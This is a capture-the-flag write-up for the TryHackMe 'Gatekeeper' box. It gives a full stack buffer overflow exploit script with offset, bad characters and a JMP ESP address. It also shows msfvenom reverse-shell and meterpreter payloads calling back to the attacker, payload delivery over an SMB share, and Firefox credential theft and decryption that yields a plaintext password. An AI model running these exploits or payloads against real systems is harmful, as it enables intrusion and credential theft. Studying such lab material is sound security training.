A medium Windows box from TryHackMe, exploit a service vulnerable to buffer overflow for initial access, then extract credentials from firefox to get root.


Start with an nmap

sudo nmap -sC -sV -Pn
Nmap scan report for  
Host is up (0.29s latency).  
Not shown: 989 closed tcp ports (reset)  
135/tcp   open  msrpc              Microsoft Windows RPC  
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn  
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)  
3389/tcp  open  ssl/ms-wbt-server?  
|_ssl-date: 2022-08-13T16:31:31+00:00; 0s from scanner time.  
| ssl-cert: Subject: commonName=gatekeeper  
| Not valid before: 2022-08-12T16:18:09  
|_Not valid after:  2023-02-11T16:18:09  
| rdp-ntlm-info:    
|   Target_Name: GATEKEEPER  
|   NetBIOS_Domain_Name: GATEKEEPER  
|   NetBIOS_Computer_Name: GATEKEEPER  
|   DNS_Domain_Name: gatekeeper  
|   DNS_Computer_Name: gatekeeper  
|   Product_Version: 6.1.7601  
|_  System_Time: 2022-08-13T16:31:23+00:00  
31337/tcp open  Elite?  
| fingerprint-strings:    
|   FourOhFourRequest:    
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0  
|     Hello  
49152/tcp open  msrpc              Microsoft Windows RPC  
49153/tcp open  msrpc              Microsoft Windows RPC  
49154/tcp open  msrpc              Microsoft Windows RPC  
49155/tcp open  msrpc              Microsoft Windows RPC  
49161/tcp open  msrpc              Microsoft Windows RPC  
49167/tcp open  msrpc              Microsoft Windows RPC  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.c  
gi?new-service :  
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows  
Host script results:  
| smb2-time:    
|   date: 2022-08-13T16:31:23  
|_  start_date: 2022-08-13T16:17:50  
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s  
| smb-security-mode:    
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: disabled (dangerous, but default)  
| smb2-security-mode:    
|   2.1:    
|_    Message signing enabled but not required  
| smb-os-discovery:    
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)  
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional  
|   Computer name: gatekeeper  
|   NetBIOS computer name: GATEKEEPER\x00  
|   Workgroup: WORKGROUP\x00  
|_  System time: 2022-08-13T12:31:23-04:00  
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:8c:40:4e:e5:67 (unknown)

There is an unidentifiable service on 31337, trying to netcat to it with

nc 31337
Hello Hello!
Hello abc123!

It just echoes our text back at us, with a hello prepended - maybe its vulnerable to buffer overflow?

Try to insert 3000 characters with

python3 -c "print('A' * 3000)"

Copying the result into the netcat session, and see that it crashes - now just need to get the executable somehow to make the payload

See that SMB is open and is able to be connected to anonymously

Enumerate the shares with

smbclient -L \\\\

       Sharename       Type      Comment  
       ---------       ----      -------  
       ADMIN$          Disk      Remote Admin  
       C$              Disk      Default share  
       IPC$            IPC       Remote IPC  
       Users           Disk

Here, “Users” seems to be the most interesting

Connecting to “Users” as anonymous

smbclient \\\\\\Users

See a few files with the ls command

smb: \> ls  
 .                                  DR        0  Thu May 14 21:57:08 2020  
 ..                                 DR        0  Thu May 14 21:57:08 2020  
 Default                           DHR        0  Tue Jul 14 03:07:31 2009  
 desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009  
 Share                               D        0  Thu May 14 21:58:07 2020

Inside of the Share directory, find a gatekeeper.exe file. likely the same executable listening on port 31337 that was found via nmap - download it with

smb: \> ls  
 .                                  DR        0  Thu May 14 21:57:08 2020  
 ..                                 DR        0  Thu May 14 21:57:08 2020 

smb: \> get gatekeeper.exe


Opening up a windows 7 VM, and transferring the gatekeeper.exe file over to it

Run the executable with Immunity Debugger - brief issue with missing VCRRUNTIME140.dll - but downloading Microsoft C++ Redistributable here fixed it

Check on kali machine to make sure that I can connect, and I can

nc LOCAL_IP 31337
Hello A!!!

Instead of making a fuzzer script, opt to do it manually, sending increments of 100 As to the program, it crashes at 200 bytes

Now to make a pattern and find the EIP register

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600  


And use that as a payload to find the EIP offset in a simple script

import socket

ip = "LOCAL_IP"
port = 31337

offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Could not connect.")

Run the exe in the debugger, and run the script to find the value of the EIP register

Then find the exact EIP offset by using

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 600 -q 39654138  
[*] Exact match at offset 146

Now can check if you can control the EIP register by trying to place 4 Bs ( equivalent to 42424242 in bytecode) into it

retn = "BBBB"

And it works

Now need to find bad characters by using an array of 0x01 to 0xff

Changing the offset value in the script to 146, and set the payload to a list of all characters in that range

offset = 146
overflow = "A" * offset
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"

Then reset immunity, run the executable, crash it with the script, right click on the ESP register, and click Follow in Dump

The values you send should be counting up 0x01 through to 0xff in the bottom left pane

Got lucky, no bad bytes besides the always-bad nullbyte 0x00

Now need to find a jump point, where there is a JMP ESP command, so we can set the EIP register to jump to executing commands stored at the location within the ESP register

Using mona

!mona jmp -r esp -b "\x00"

Found two locations, lets pick the first one

Using address 0x080414c3 - needs to be written backwards in the script because the victim is little endien

retn = "\xc3\x14\x04\x08"

Now need to generate the payload that will be used for the reverse shell

Very important to include th EXITFUNC=thread so that it doesn’t crash the running process

msfvenom -p windows/shell_reverse_tcp LHOST=LOCAL_IP LPORT=4444 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00"

# Local IP will be replaced with VPN IP when used against the tryhackme box

It works!

Now just change the IP and shoot it at the TryHackMe box for initial access

On the box, see that it has firefox installed, as there is a firefox file in the desktop of the initial user

04/21/2020  05:00 PM             1,197 Firefox.lnk

Upgrading to a meterpreter shell to try and extract any creds within firefox

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=8888 -f exe > rshell.exe

Then downloading it onto the target via impackets smb server

python3 /opt/impacket/examples/smbserver.py SHARE .

And on the target

copy \\\SHARE\rshell.exe .

Starting up and setting up multi/hander in msfconsole, and running the exe - get a meterpreter shell

And run the firefox cred post module

meterpreter > run post/multi/gather/firefox_creds

*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\  
[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release  
[+] Downloaded cert9.db: /home/kali/.msf4/loot/20220813155623_default_10.10.22.137_ff.ljfn812a.cert_590881.bin  
[+] Downloaded cookies.sqlite: /home/kali/.msf4/loot/20220813155624_default_10.10.22.137_ff.ljfn812a.cook_347874.bin  
[+] Downloaded key4.db: /home/kali/.msf4/loot/20220813155626_default_10.10.22.137_ff.ljfn812a.key4_515684.bin  
[+] Downloaded logins.json: /home/kali/.msf4/loot/20220813155627_default_10.10.22.137_ff.ljfn812a.logi_112967.bin  
[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default
run post/multi/gather/firefox_creds

Transfer the files from the loot directory to the local one

And then use this to decrypt them, with a quick git clone

Renaming all the looted files to what they should be called - gotten from the post module

mv 20220813155623_default_10.10.22.137_ff.ljfn812a.cert_590881.bin cert9.db

mv 20220813155624_default_10.10.22.137_ff.ljfn812a.cook_347874.bin cookies.sqlite

mv 20220813155626_default_10.10.22.137_ff.ljfn812a.key4_515684.bin key4.db

mv 20220813155627_default_10.10.22.137_ff.ljfn812a.logi_112967.bin logins.json

Then running the python script in the directory with the looted files like so

python firefox_decrypt.py .

End up with the creds

Website:   https://creds.com  
Username: 'mayor'  
Password: '8CL7O1N78MdrCIsV'

From previous enumeration, saw that “mayor” is another user, as they have a directory in C:/Users/

Can just rdp in as the mayor with the creds, and get the root flag on the desktop!